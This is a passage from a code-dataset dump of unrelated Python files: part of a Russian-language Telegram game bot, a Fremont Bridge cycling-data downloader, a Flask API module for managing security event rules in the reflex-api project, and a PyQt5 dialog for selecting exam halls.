start_game(user_id):\n    global user\n    if user.level is None:\n        show_levels(user_id)\n    else:\n        start_tasks(user_id)\n\n\ndef show_levels(user_id):\n    markup = generate_levels_markup()\n    bot.send_message(user_id, text='Выбери уровень игры', reply_markup=markup)\n\n\ndef generate_levels_markup():\n    list_items = ['Зеленый уровень', 'Желтый уровень', 'Красный уровень', 'Главное меню']\n    markup = types.ReplyKeyboardMarkup(one_time_keyboard=True, resize_keyboard=True)\n    for item in list_items:\n        markup.add(item)\n    return markup\n\n\ndef show_settings(user_id):\n    markup = generate_settings_markup()\n    bot.send_message(user_id, text='Настройки', reply_markup=markup)\n\n\ndef generate_settings_markup():\n    list_items = ['Зеленый уровень', 'Желтый уровень', 'Красный уровень', 'Главное меню']\n    markup = types.ReplyKeyboardMarkup(one_time_keyboard=True, resize_keyboard=True)\n    for item in list_items:\n        markup.add(item)\n    return markup\n\n\ndef start_tasks(user_id):\n    task_list = tasks.get_tasks()\n    markup = next_task_markup()\n    # show the first task from the fetched list (tasks is the imported module)\n    bot.send_message(user_id, text=task_list[0].description, reply_markup=markup)\n\n\ndef next_task_markup():\n    list_items = ['Следующее задание', 'Следующий уровень', 'Главное меню']\n    markup = types.ReplyKeyboardMarkup(one_time_keyboard=True, resize_keyboard=True)\n    for item in list_items:\n        markup.add(item)\n    return markup\n\n\nbot.polling(none_stop=True, interval=0)\n\n","repo_name":"g00dvveen/fants","sub_path":"bot/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":5002,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23254553274","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 22 09:44:10 2021\n\n@author: RP\n\"\"\"\n\n\nfrom urllib.request import urlretrieve\nimport os\nimport pandas as pd\n\n# Link to data that can be retrieved without a file path and/or clicks\n# e.g. 
URL, database, etc.\nURL = 'https://data.seattle.gov/api/views/65db-xm6k/rows.csv?accessType=DOWNLOAD'\n\n# This function downloads the data and puts it in the repo if it doesn't already exist\ndef get_fremont_data(filename='fremont-bridge.csv',url=URL,force_download=False):\n\n    \"\"\"Download and cache the fremont data set\n    \n    Parameters\n    ----------\n    filename : string (optional)\n        location to save the data\n    url : string (optional)\n        web location of the data\n    force_download : bool (optional)\n        if true, force re-download of data\n\n    Returns\n    -------\n    data : pandas.DataFrame\n        The fremont bridge data\n    \"\"\"\n\n    if force_download or not os.path.exists(filename):\n        urlretrieve(url, filename)\n    \n    # Read the cached file into a dataframe\n    data = pd.read_csv(filename,index_col='Date')\n    \n    date_format = '%m/%d/%Y %I:%M:%S %p'\n    \n    try:\n        data.index = pd.to_datetime(data.index,format=date_format)\n    except ValueError:\n        data.index = pd.to_datetime(data.index)\n\n    \n    # The column names are a bit long so we can make them shorter\n    data.columns = ['Total','East Sidewalk','West Sidewalk']\n    \n    return data","repo_name":"robertpullin/cycling-data-analysis","sub_path":"jupyterworkflow/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8281695857","text":"import time\nimport math\nimport json\nfrom app.api_v2.model.system import Settings\nimport ndjson\nimport datetime\nimport threading\nfrom queue import Queue\nfrom flask import Response, current_app\nfrom flask_restx import Resource, Namespace, fields, marshal\nfrom werkzeug.datastructures import FileStorage\nfrom werkzeug.utils import secure_filename\nfrom ..rql.parser import QueryParser\nfrom ..model import EventRule, Event, Task, CloseReason\nfrom ..model.exceptions import EventRuleFailure\nfrom ..utils import random_ending, token_required, user_has, check_org, log_event, default_org\nfrom .shared import ISO8601, FormatTags, mod_pagination, mod_observable_list, mod_observable_brief, AsDict\nfrom .event import mod_event_status\nfrom ... 
import ep\n\n\napi = Namespace('EventRule', description='Event Rules control what happens to an event on ingest', path='/event_rule')\n\nmod_event_rule_test = api.model('TestEventRuleQuery', {\n 'query': fields.String(required=True),\n 'organization': fields.String(required=True),\n 'uuid': fields.String,\n 'event_count': fields.Integer(required=True),\n 'return_results': fields.Boolean,\n 'start_date': fields.String,\n 'end_date': fields.String,\n})\n\nmod_event_rule_create = api.model('CreateEventRule', {\n 'name': fields.String,\n 'organization': fields.String,\n 'description': fields.String,\n 'event_signature': fields.String,\n 'merge_into_case': fields.Boolean,\n 'target_case_uuid': fields.String,\n 'add_tags': fields.Boolean,\n 'tags_to_add': fields.List(fields.String),\n 'update_severity': fields.Boolean,\n 'target_severity': fields.Integer,\n 'mute_event': fields.Boolean,\n 'mute_period': fields.Integer,\n 'query': fields.String,\n 'dismiss': fields.Boolean,\n 'dismiss_reason': fields.String,\n 'dismiss_comment': fields.String,\n 'expire': fields.Boolean,\n 'expire_days': fields.Integer,\n 'active': fields.Boolean,\n 'global_rule': fields.Boolean,\n 'run_retroactively': fields.Boolean(optional=True),\n 'skip_previous_match': fields.Boolean(optional=True)\n})\n\nmod_event_rule_list = api.model('EventRuleList', {\n 'uuid': fields.String,\n 'organization': fields.String,\n 'name': fields.String,\n 'description': fields.String,\n 'event_signature': fields.String,\n 'dismiss_comment': fields.String,\n 'dismiss_reason': fields.String,\n 'rule_signature': fields.String,\n 'merge_into_case': fields.Boolean,\n 'target_case_uuid': fields.String,\n 'add_tags': fields.Boolean,\n 'tags_to_add': FormatTags(attribute='tags_to_add'),\n 'update_severity': fields.Boolean,\n 'target_severity': fields.Integer,\n 'mute_event': fields.Boolean,\n 'mute_period': fields.Integer,\n 'dismiss': fields.Boolean,\n 'expire': fields.Boolean,\n 'expire_days': fields.Integer,\n 'active': fields.Boolean,\n 'query': fields.String,\n 'hits': fields.Integer,\n 'hits_last_24': fields.Integer,\n 'observables': fields.List(fields.Nested(mod_observable_brief)),\n 'expire_at': ISO8601(attribute='expire_at'),\n 'created_at': ISO8601(attribute='created_at'),\n 'updated_at': ISO8601(attribute='updated_at'),\n 'last_matched_date': ISO8601(attribute='last_matched_date'),\n 'global_rule': fields.Boolean,\n 'disable_reason': fields.String\n})\n\nmod_event_rule_list_paged = api.model('PagedEventRuleList', {\n 'event_rules': fields.List(fields.Nested(mod_event_rule_list)),\n 'pagination': fields.Nested(mod_pagination)\n})\n\nmod_event_rql = api.model('EventDetailsRQLFormatted', {\n 'uuid': fields.String,\n 'title': fields.String(required=True),\n 'reference': fields.String(required=True),\n 'description': fields.String(required=True),\n 'tlp': fields.Integer,\n 'severity': fields.Integer,\n 'source': fields.String,\n 'status': fields.Nested(mod_event_status),\n 'tags': fields.List(fields.String),\n 'observables': fields.List(fields.Nested(mod_observable_list)),\n 'case': fields.String,\n 'created_at': ISO8601(attribute='created_at'),\n 'modified_at': ISO8601(attribute='updated_at'),\n 'raw_log': AsDict,\n 'signature': fields.String\n})\n\nmod_event_rule_name_only = api.model('EventRuleNames', {\n 'uuid': fields.String,\n 'name': fields.String\n})\n\nevent_rule_list_parser = api.parser()\nevent_rule_list_parser.add_argument('page', type=int, location='args', default=1, required=False)\nevent_rule_list_parser.add_argument('sort_by', 
type=str, location='args', default='created_at', required=False)\nevent_rule_list_parser.add_argument('sort_direction', type=str, location='args', default='asc', required=False)\nevent_rule_list_parser.add_argument('page_size', type=int, location='args', default=25, required=False)\nevent_rule_list_parser.add_argument('rules', location='args', required=False, type=str, action='split')\n\n@api.route(\"\")\nclass EventRuleList(Resource):\n\n    @api.doc(security=\"Bearer\")\n    @api.marshal_with(mod_event_rule_list_paged)\n    @api.expect(event_rule_list_parser)\n    @token_required\n    @user_has('view_event_rules')\n    def get(self, current_user):\n        ''' Gets a list of all the event rules '''\n\n        args = event_rule_list_parser.parse_args()\n\n        event_rules = EventRule.search()\n        event_rules = event_rules.filter('term', deleted=False)\n\n        if args.rules:\n            event_rules = event_rules.filter('terms', uuid=list(set(args.rules)))\n        \n        event_rules = list(event_rules.scan())\n\n        response = {\n            'event_rules': event_rules,\n            'pagination': {\n                'total_results': len(event_rules),\n                'pages': 1,\n                'page': 1,\n                'page_size': args.page_size\n            }\n        }\n\n        return response\n\n    @api.doc(security=\"Bearer\")\n    @api.expect(mod_event_rule_create)\n    @api.marshal_with(mod_event_rule_list)\n    @api.response('200', 'Successfully created event rule.')\n    @token_required\n    @user_has('create_event_rule')\n    @check_org\n    def post(self, current_user):\n        ''' Creates a new event_rule '''\n\n        if 'organization' in api.payload:\n            settings = Settings.load(organization=api.payload['organization'])\n        else:\n            settings = Settings.load()\n        \n        if 'organization' in api.payload:\n            event_rule = EventRule.get_by_name(name=api.payload['name'], organization=api.payload['organization'])\n        else:\n            event_rule = EventRule.get_by_name(name=api.payload['name'])\n\n        # Only the default tenant can create global rules\n        if 'global_rule' in api.payload and not hasattr(current_user,'default_org'):\n            api.payload['global_rule'] = False\n\n        if 'global_rule' not in api.payload:\n            api.payload['global_rule'] = False\n\n        if 'dismiss' in api.payload and api.payload['dismiss']:\n\n            if 'dismiss_reason' not in api.payload or api.payload['dismiss_reason'] in [None,'']:\n                api.abort(400, 'A dismiss reason is required') \n\n            if settings.require_event_dismiss_comment and 'dismiss_comment' not in api.payload:\n                api.abort(400, 'Dismiss comment required')\n\n            cr = CloseReason.get_by_uuid(uuid=api.payload['dismiss_reason'])\n            if not cr:\n                api.abort(404, 'Dismiss reason not found')\n\n        if 'expire_days' in api.payload and not isinstance(api.payload['expire_days'], int):\n            api.abort(400, 'expire_days should be an integer.')\n\n        # Compute when the rule should expire\n        if 'expire' in api.payload and api.payload['expire']:\n            if 'expire_days' in api.payload:\n                expire_days = api.payload['expire_days']\n\n                expire_at = datetime.datetime.utcnow() + datetime.timedelta(days=expire_days)\n                api.payload['expire_at'] = expire_at\n            else:\n                api.abort(400, 'Missing expire_days field.')\n\n        if not event_rule:\n\n            event_rule = EventRule(**api.payload)\n            event_rule.active = True\n\n            # Try to parse the rule and if it fails don't activate it\n            try:\n                event_rule.parse_rule()\n                event_rule.parsed_rule = None\n            except Exception as e:\n                event_rule.active = False\n                api.abort(400, f'Invalid RQL Query. 
{e}')\n #event_rule.disable_reason = f\"Invalid RQL query. {e}\"\n\n # Set the default state for new Event Rules to not deleted\n event_rule.deleted = False\n event_rule.save(refresh=True)\n time.sleep(1)\n ep.restart_workers()\n\n if 'run_retroactively' in api.payload and api.payload['run_retroactively']:\n \n task = Task()\n request_id = task.create(task_type='event_rule_lookbehind', message=f'Event Rule lookbehind for {event_rule.name} complete.', broadcast=True)\n\n def delayed_retro_push(task, skip_previous, event_rule, api_payload, events):\n '''\n Queries for events and pushes them to the event queue for retro processing\n '''\n\n time.sleep(10)\n\n try:\n is_global = api_payload['global_rule'] if 'global_rule' in api_payload and api_payload['global_rule'] == True else False\n org_specified = api_payload['organization'] if 'organization' in api_payload and api_payload['organization'] != None else None\n\n if not is_global and org_specified:\n events = events.filter('term', organization=api_payload['organization'])\n elif not is_global:\n events = events.filter('term', organization=current_user.organization)\n \n events = events.filter('term', status__name__keyword='New')\n\n task.message += f\" {events.count()} events processed.\"\n task.save()\n\n events = list(events.scan())\n \n if events:\n time.sleep(2)\n for event in events:\n\n # Skip over this event if skip_previous_match is toggled and the\n # event matches the critera\n if skip_previous:\n if event_rule.uuid in event.event_rules:\n continue\n \n event_dict = event.to_dict()\n\n if 'event_observables' in event_dict:\n event_dict['observables'] = event_dict['event_observables']\n \n event_dict['_meta'] = {\n 'action': 'retro_apply_event_rule',\n '_id': event.meta.id,\n 'rule_id': str(event_rule.uuid)\n }\n ep.enqueue(event_dict)\n\n ep.enqueue({'organization': current_user.organization, '_meta':{'action': 'task_end', 'task_id': str(task.uuid)}})\n except Exception as e:\n print(e)\n \n skip_previous = False\n if 'skip_previous_match' in api.payload and api.payload['skip_previous_match']:\n skip_previous = True\n\n events = Event.search()\n\n t = threading.Thread(target=delayed_retro_push, daemon=True, args=(task, skip_previous, event_rule, api.payload, events))\n t.start()\n\n return event_rule\n else:\n api.abort(400, 'Event Rule with this title already exists.')\n\n\n@api.route(\"/\")\nclass EventRuleDetails(Resource):\n\n @api.doc(security=\"Bearer\")\n @api.marshal_with(mod_event_rule_list)\n @token_required\n @user_has('view_event_rules')\n def get(self, uuid, current_user):\n ''' Gets a event rule '''\n event_rule = EventRule.get_by_uuid(uuid=uuid)\n if event_rule:\n return event_rule\n else:\n api.abort(404, 'Event rule not found.')\n\n @api.doc(security=\"Bearer\")\n @api.expect(mod_event_rule_create)\n @api.marshal_with(mod_event_rule_list)\n @token_required\n @user_has('update_event_rule')\n def put(self, uuid, current_user):\n ''' Updates the event rule '''\n event_rule = EventRule.get_by_uuid(uuid=uuid)\n\n if event_rule:\n\n if 'expire_days' in api.payload and not isinstance(api.payload['expire_days'], int):\n api.abort(400, 'expire_days should be an integer.')\n\n # Only the default tenant can create global rules\n if 'global_rule' in api.payload and not hasattr(current_user,'default_org'):\n api.payload['global_rule'] = False\n\n # Computer when the rule should expire\n if 'expire' in api.payload and api.payload['expire']:\n if 'expire_days' in api.payload:\n expire_days = api.payload['expire_days']\n\n 
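# convert the relative expiry window (in days) into an absolute UTC timestamp\n 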
expire_at = datetime.datetime.utcnow() + datetime.timedelta(days=expire_days)\n api.payload['expire_at'] = expire_at\n else:\n api.abort(400, 'Missing expire_days field.')\n\n if 'query' in api.payload and api.payload['query'] != event_rule.query:\n if hasattr(event_rule, 'version') and event_rule.version:\n api.payload['version'] = event_rule.version + 1\n else:\n api.payload['version'] = 2\n\n if len(api.payload) > 0:\n event_rule.update(**{**api.payload, 'disable_reason': None}, refresh=True)\n time.sleep(1)\n ep.restart_workers()\n\n if 'run_retroactively' in api.payload and api.payload['run_retroactively']:\n\n task = Task()\n request_id = task.create(task_type='event_rule_lookbehind', message=f'Event Rule lookbehind for {event_rule.name} complete.', broadcast=True)\n\n events = Event.search()\n \n def delayed_retro_push(task, skip_previous, api_payload, events):\n '''\n Queries for events and pushes them to the event queue for retro processing\n '''\n\n time.sleep(10)\n\n try:\n is_global = api_payload['global_rule'] if 'global_rule' in api_payload and api_payload['global_rule'] == True else False\n org_specified = api_payload['organization'] if 'organization' in api_payload and api_payload['organization'] != None else None\n\n if not is_global and org_specified:\n events = events.filter('term', organization=api_payload['organization'])\n elif not is_global:\n events = events.filter('term', organization=current_user.organization)\n \n events = events.filter('term', status__name__keyword='New')\n\n task.message += f\" {events.count()} events processed.\"\n task.save()\n\n events = list(events.scan())\n \n if events:\n time.sleep(2)\n for event in events:\n\n # Skip over this event if skip_previous_match is toggled and the\n # event matches the critera\n if skip_previous:\n if event_rule.uuid in event.event_rules:\n continue\n \n event_dict = event.to_dict()\n if 'event_observables' in event_dict:\n event_dict['observables'] = event_dict['event_observables']\n event_dict['_meta'] = {\n 'action': 'retro_apply_event_rule',\n '_id': event.meta.id,\n 'rule_id': event_rule.uuid\n }\n ep.enqueue(event_dict)\n\n ep.enqueue({'organization': current_user.organization, '_meta':{'action': 'task_end', 'task_id': str(task.uuid)}})\n except Exception as e:\n print(e)\n \n skip_previous = False\n if 'skip_previous_match' in api.payload and api.payload['skip_previous_match']:\n skip_previous = True\n\n with current_app.app_context():\n t = threading.Thread(target=delayed_retro_push, daemon=True, args=(task, skip_previous, api.payload, events))\n t.start()\n \n return event_rule\n else:\n api.abort(404, 'Event rule not found.')\n\n @api.doc(security=\"Bearer\")\n @token_required\n @user_has('delete_event_rule')\n def delete(self, uuid, current_user):\n ''' Removes an event rule '''\n event_rule = EventRule.get_by_uuid(uuid=uuid)\n if event_rule:\n event_rule.name = event_rule.name+random_ending('DELETED')\n event_rule.active = False\n event_rule.deleted = True\n event_rule.save(refresh=True)\n time.sleep(1)\n return {'message': 'Sucessfully deleted the event rule.'}\n\n\nevent_rule_stats_parser = api.parser()\nevent_rule_stats_parser.add_argument('rules', type=str, location='args', action='split', required=False)\nevent_rule_stats_parser.add_argument('metrics', type=str, location='args', action='split', required=False, default=['hits'])\nevent_rule_stats_parser.add_argument('start', location='args', type=str, required=False)\nevent_rule_stats_parser.add_argument('end', location='args', type=str, 
required=False)\n@api.route(\"/stats\")\nclass EventRuleStats(Resource):\n\n @api.doc(security=\"Bearer\")\n @api.expect(event_rule_stats_parser)\n @token_required\n @user_has('view_event_rules') \n def get(self, current_user):\n args = event_rule_stats_parser.parse_args()\n\n metrics = {}\n\n # Set default start/end date filters if they are not set above\n # We do this here because default= on add_argument() is only calculated when the API is initialized\n if not args.start:\n args.start = (datetime.datetime.utcnow()-datetime.timedelta(days=7)).strftime('%Y-%m-%dT%H:%M:%S')\n if not args.end:\n args.end = (datetime.datetime.utcnow()+datetime.timedelta(days=1)).strftime('%Y-%m-%dT%H:%M:%S')\n\n # Compute the number of hits on an event rule\n if 'hits' in args.metrics:\n search = Event.search()\n\n search.aggs.bucket('range', 'filter', range={'created_at': {\n 'gte': args.start,\n 'lte': args.end\n }})\n \n if args.rules and len(args.rules) > 0:\n search = search.filter('terms', event_rules=args.rules)\n\n search.aggs['range'].bucket('event_rules', 'terms', order={'max_date': 'desc'}, field='event_rules', size=10000)\n search.aggs['range']['event_rules'].metric('max_date', 'max', field='created_at')\n search = search[:0]\n \n result = search.execute()\n\n # Prepare the hits metric\n if 'hits' in args.metrics:\n metrics['hits'] = {v['key']: v['doc_count'] for v in result.aggs.range.event_rules.buckets}\n metrics['last_hit'] = {v['key']: v['max_date']['value_as_string'] for v in result.aggs.range.event_rules.buckets}\n\n return metrics\n\n\nexport_rule_parser = api.parser()\nexport_rule_parser.add_argument('organizations', type=str, action='split', location='args', required=False)\n\n@api.route('/export')\nclass ExportEventRules(Resource):\n\n @api.doc(security=\"Bearer\")\n @api.expect(export_rule_parser)\n @api.header('Content-Type', 'application/x-ndjson')\n @token_required\n @check_org\n @user_has('view_event_rules')\n def get(self, current_user):\n '''\n Takes a list of organizations and exports all the Event Rules for the supplied organizations\n as NDJSON, if no organizations are provided, just dump the rules for the users current\n organization.\n '''\n\n args = export_rule_parser.parse_args()\n\n event_rules = EventRule.search()\n\n if args.organizations:\n print(args.organizations)\n else: \n event_rules = event_rules.filter('term', organization=current_user.organization)\n \n event_rules = event_rules.scan() \n\n output = ndjson.dumps([marshal(e, mod_event_rule_list) for e in event_rules])\n resp = Response(output,headers={'Content-Type': 'application/x-ndjson', 'Content-disposition':'attachment; filename=event_rules.ndjson'})\n \n return resp\n\nupload_parser = api.parser()\nupload_parser.add_argument('files', location='files',\n type=FileStorage, required=True, action=\"append\")\n\n@api.route('/import')\nclass ImportEventRules(Resource):\n\n @api.doc(security=\"Bearer\")\n @api.expect(upload_parser)\n @token_required\n @default_org\n @user_has('create_event_rule')\n def post(self, user_in_default_org, current_user):\n\n args = upload_parser.parse_args()\n\n def allowed_file(filename):\n return '.' 
in filename and filename.rsplit('.', 1)[1].lower() in ['ndjson']  # rsplit drops the dot, so compare against the bare extension\n\n        uploaded_files = args.files\n        for uploaded_file in uploaded_files:\n            print(uploaded_file)\n        return \"\"\n\n\n@api.route(\"/test_rule_rql\")\nclass TestEventRQL(Resource):\n\n    @api.expect(mod_event_rule_test)\n    @token_required\n    @default_org\n    @user_has('create_event_rule')\n    def post(self, user_in_default_org, current_user):\n        ''' Tests an RQL query against a target event to see if the RQL is valid '''\n\n        date_filtered = False\n\n        event = None\n\n        if ('query' in api.payload and api.payload['query'] == '') or 'query' not in api.payload:\n            return {'message':'Missing RQL query.', \"success\": False}, 400\n\n        if 'event_count' in api.payload and api.payload['event_count'] > 2147483647:\n            api.abort(400, 'Number of test events can not exceed 2147483647')\n\n        if 'uuid' in api.payload and api.payload['uuid'] not in [None, '']:\n            event = Event.get_by_uuid(uuid=api.payload['uuid'])\n            event_data = json.loads(json.dumps(marshal(event, mod_event_rql))) \n        else:\n\n            # A date filter is required when not supplying a single event UUID\n            if 'start_date' in api.payload and 'end_date' in api.payload:\n                date_filtered = True\n            else:\n                return {'message': 'A date range is required', \"success\": False}, 400\n\n            search = Event.search()\n            \n            if 'organization' in api.payload and api.payload['organization']:\n                search = search.filter('term', organization=api.payload['organization'])\n            else:\n                if hasattr(current_user, 'default_org') and not current_user.default_org:\n                    search = search.filter('term', organization=current_user.organization)\n            search = search.sort('-original_date')\n            search = search[0:api.payload['event_count']]\n\n            # Apply a date filter\n            if date_filtered:\n                search = search.filter('range', **{'original_date': {\n                    'gte': api.payload['start_date'],\n                    'lte': api.payload['end_date']\n                }})\n\n            if 'event_count' in api.payload and api.payload['event_count'] > 10000:\n                events = list(search.scan())\n            else:\n                events = search.execute()\n            \n            event_data = [json.loads(json.dumps(marshal(e, mod_event_rql))) for e in events]\n        \n        try:\n            organization = current_user.organization\n\n            if event:\n                if user_in_default_org and event.organization != current_user.organization:\n                    organization = event.organization\n            else:\n                if user_in_default_org and 'organization' in api.payload:\n                    organization = api.payload['organization']\n            \n            qp = QueryParser(organization=organization)\n            parsed_query = qp.parser.parse(api.payload['query'])\n            result = [r for r in qp.run_search(event_data, parsed_query)]\n            hits = len(result)\n\n            if hits > 0:\n                if 'return_results' in api.payload and api.payload['return_results']:\n                    return {\"message\": f\"Query matched {hits} Events\", \"success\": True, \"hits\": [result]}, 200\n                return {\"message\": f\"Query matched {hits} Events\", \"success\": True}, 200\n            else:\n                return {\"message\": \"Query did not match target Event\", \"success\": False}, 200\n        except ValueError as e:\n            return {\"message\":f\"Invalid RQL query. 
{e}\", \"success\": False}, 400\n ","repo_name":"reflexsoar/reflex-api","sub_path":"app/api_v2/resource/event_rule.py","file_name":"event_rule.py","file_ext":"py","file_size_in_byte":25841,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"20892905365","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtWidgets import QDialog, QFileDialog\n\nfrom hall_select import HallSelect\n\n\nclass Ui_DialogHalls(QDialog):\n def __init__(self, centralWidget, classes, totalStudents):\n super().__init__()\n self.classes = classes\n self.totalStudents = totalStudents\n self.centralWidget = centralWidget\n self.setupUi()\n self.exec()\n\n def setupUi(self):\n self.setObjectName(\"Dialog\")\n self.resize(566, 193)\n self.setStyleSheet(\"background-color: rgb(20, 24, 34);\")\n self.frame = QtWidgets.QFrame(self)\n self.frame.setGeometry(QtCore.QRect(0, 0, 291, 341))\n self.frame.setStyleSheet(\"font: 75 11pt \\\"Uroob\\\";\\n\"\n \"background-color: rgb(239, 41, 41);\")\n self.frame.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.frame.setFrameShadow(QtWidgets.QFrame.Raised)\n self.frame.setObjectName(\"frame\")\n self.label = QtWidgets.QLabel(self.frame)\n self.label.setGeometry(QtCore.QRect(30, 50, 221, 41))\n font = QtGui.QFont()\n font.setFamily(\"Ubuntu Condensed\")\n font.setPointSize(15)\n font.setBold(False)\n font.setItalic(False)\n font.setWeight(6)\n self.label.setFont(font)\n self.label.setStyleSheet(\"font: 50 15pt \\\"Ubuntu Condensed\\\";\")\n self.label.setObjectName(\"label\")\n self.pushButton = QtWidgets.QPushButton(self.frame)\n self.pushButton.setGeometry(QtCore.QRect(90, 100, 89, 25))\n self.pushButton.setObjectName(\"pushButton\")\n self.label_2 = QtWidgets.QLabel(self)\n self.label_2.setGeometry(QtCore.QRect(310, 60, 241, 31))\n self.label_2.setStyleSheet(\"font: 75 20pt \\\"Ubuntu Condensed\\\";\\n\"\n \"color: rgb(204, 0, 0);\")\n self.label_2.setObjectName(\"label_2\")\n self.pushButton_2 = QtWidgets.QPushButton(self)\n self.pushButton_2.setGeometry(QtCore.QRect(380, 100, 89, 25))\n self.pushButton_2.setStyleSheet(\"background-color: rgb(239, 41, 41);\\n\"\n \"border-color: rgb(115, 210, 22);\")\n self.pushButton_2.setObjectName(\"pushButton_2\")\n\n self.retranslateUi()\n QtCore.QMetaObject.connectSlotsByName(self)\n self.pushButton.clicked.connect(self.upload)\n self.pushButton_2.clicked.connect(self.select)\n\n def select(self):\n self.deleteLater()\n HallSelect(self.centralWidget, classes=self.classes, totalStudents=self.totalStudents, status=0)\n\n def upload(self):\n self.deleteLater()\n directory = QFileDialog.getOpenFileName()\n directory = directory[0]\n\n HallSelect(self.centralWidget, classes=self.classes, totalStudents=self.totalStudents, status=1)\n\n def retranslateUi(self):\n _translate = QtCore.QCoreApplication.translate\n self.setWindowTitle(_translate(\"Dialog\", \"Dialog\"))\n self.label.setText(_translate(\"Dialog\", \"Upload ExamHalls file as .txt file\"))\n self.pushButton.setText(_translate(\"Dialog\", \"Upload\"))\n self.label_2.setText(_translate(\"Dialog\", \"Select from CheckBoxes\"))\n self.pushButton_2.setText(_translate(\"Dialog\", \"Select\"))\n","repo_name":"Sesuraj-git/SeatingAllotment","sub_path":"dialogHalls.py","file_name":"dialogHalls.py","file_ext":"py","file_size_in_byte":3248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}